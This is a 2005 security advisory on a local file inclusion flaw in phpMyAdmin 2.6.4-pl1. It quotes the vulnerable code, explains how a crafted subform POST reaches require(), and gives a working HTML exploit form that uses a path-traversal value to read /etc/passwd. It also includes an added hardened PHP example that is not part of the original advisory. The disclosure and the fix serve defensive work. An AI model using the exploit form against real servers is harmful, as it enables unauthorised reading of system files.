-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[phpMyAdmin Local file inclusion 2.6.4-pl1]

Author: Maksymilian Arciemowicz ( cXIb8O3 ).18
Date: 10.10.2005
from SECURITYREASON.COM

- --- 0.Description ---
phpMyAdmin 2.6.4 is a tool written in PHP intended to
handle the administration of MySQL over the Web.
Currently it can create and drop databases,
create/drop/alter tables, delete/edit/add fields,
execute any SQL statement, manage keys on fields.
blablabla...
phpMyAdmin is a very dangerous script.

- --- 1. Local file inclusion (Critical) ---
File: ./libraries/grab_globals.lib.php

This file is included by many files, for example index.php:

- -index.php--
<?php
/* $Id: index.php,v 2.14 2004/10/19 17:23:09 nijel Exp $ */
// vim: expandtab sw=4 ts=4 sts=4:

/**
 * Gets core libraries and defines some variables
 */
require_once('./libraries/grab_globals.lib.php');
require_once('./libraries/common.lib.php');
...
- -index.php--

OK, so in ./libraries/grab_globals.lib.php we have:

- -101-104-grab_globals.lib.php---------
if ( ! empty( $__redirect ) ) {
    require('./' . $__redirect);
    exit();
} // end if ( ! empty( $__redirect ) )
- -101-104-grab_globals.lib.php---------

But earlier in the same file we have:

- -53-67-grab_globals.lib.php-----------
// check if a subform is submitted
$__redirect = NULL;
if ( isset( $_POST['usesubform'] ) ) {
    // if a subform is present and should be used
    // the rest of the form is deprecated
    $subform_id = key( $_POST['usesubform'] );
    $subform    = $_POST['subform'][$subform_id];
    $_POST      = $subform;
    if ( isset( $_POST['redirect'] ) 
      && $_POST['redirect'] != basename( $_SERVER['PHP_SELF'] ) ) {
        $__redirect = $_POST['redirect'];
        unset( $_POST['redirect'] );
    } // end if ( isset( $_POST['redirect'] ) )
} // end if ( isset( $_POST['usesubform'] ) )
// end check if a subform is submitted
- -53-67-grab_globals.lib.php-----------

If the variable $_POST['usesubform'] exists and is an array, we can create new variables in $_POST (for example $_POST['redirect']).

    $subform    = $_POST['subform'][$subform_id];
    $_POST      = $subform;

Here the array $_POST is replaced by the array $_POST['subform'][1], so

$_POST['redirect'] = $_POST['subform'][1]['redirect']

and the value reaches require() unchecked: we have a local file inclusion.
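
A hardened variant of the subform handling quoted above, as an added example (not part of the original advisory and not phpMyAdmin's actual fix). The function name resolve_subform_redirect, the $allowedTargets allowlist and the script names in it are hypothetical.

```php
<?php
// Added example: hypothetical hardened form of the subform redirect logic.
// It returns the promoted POST array and a redirect target that is either
// null or an exact entry from an allowlist of script names.

function resolve_subform_redirect(array $post, string $self, array $allowedTargets): array
{
    $redirect = null;

    if (isset($post['usesubform']) && is_array($post['usesubform'])) {
        $subformId = key($post['usesubform']);
        $subform   = $post['subform'][$subformId] ?? null;

        // Promote the subform only if it really is an array of fields.
        if (is_array($subform)) {
            $post = $subform;

            if (isset($post['redirect']) && is_string($post['redirect'])) {
                $candidate = $post['redirect'];
                unset($post['redirect']);

                // Accept only a bare, known script name: no directory
                // separators, no "..", and nothing outside the allowlist.
                if ($candidate !== basename($self)
                    && $candidate === basename($candidate)
                    && in_array($candidate, $allowedTargets, true)) {
                    $redirect = $candidate;
                }
            }
        }
    }
    return [$post, $redirect];
}

// Constructed sample input using the field names from the advisory.
$post = [
    'usesubform' => ['1' => '1'],
    'subform'    => ['1' => ['redirect' => '../../../../etc/passwd']],
];
$allowed = ['page_a.php', 'page_b.php']; // placeholder allowlist

// A traversal value never becomes a redirect target.
[, $target] = resolve_subform_redirect($post, '/index.php', $allowed);
var_dump($target);

// An allowlisted bare script name is passed through unchanged.
$post['subform']['1']['redirect'] = 'page_a.php';
[, $target] = resolve_subform_redirect($post, '/index.php', $allowed);
var_dump($target);
```

The caller would then require() only a non-null result, so the included path is always a fixed string from the allowlist and never request data.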

Example request form in HTML:

- -Exploit---
<CENTER>
<A HREF="http://www.securityreason.com><IMG SRC="http://securityreason.com/gfx/small_logo.png"></A><P>
<FORM action="http://localhost/phpMyAdmin-2.6.4-pl1/index.php" method=post enctype="multipart/form-data">
<input TYPE="hidden" name="usesubform[1]" value="1">
<input TYPE="hidden" name="usesubform[2]" value="1">
<input TYPE="text" name="subform[1][redirect]" value="../../../../../../../etc/passwd" size=30> File<p>
<input TYPE="hidden" name="subform[1][cXIb8O3]" value="1">
<input TYPE="submit" value="Exploit">
</FORM>
- -Exploit---

Exploit:
http://securityreason.com/achievement_exploitalert/2

- --- 2. Greets ---

sp3x

- --- 3.Contact ---
Author: Maksymilian Arciemowicz < cXIb8O3 >
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG-KEY: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
WWW: http://securityreason.com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (FreeBSD)

iD8DBQFDSnd/3Ke13X/fTO4RAse3AKCAT3s7bzwySDsGHqYN0+Vm+D+OiwCdFf/T
cvqCRiRlK9XrQGvV3sYxzXQ=
=yoDY
-----END PGP SIGNATURE-----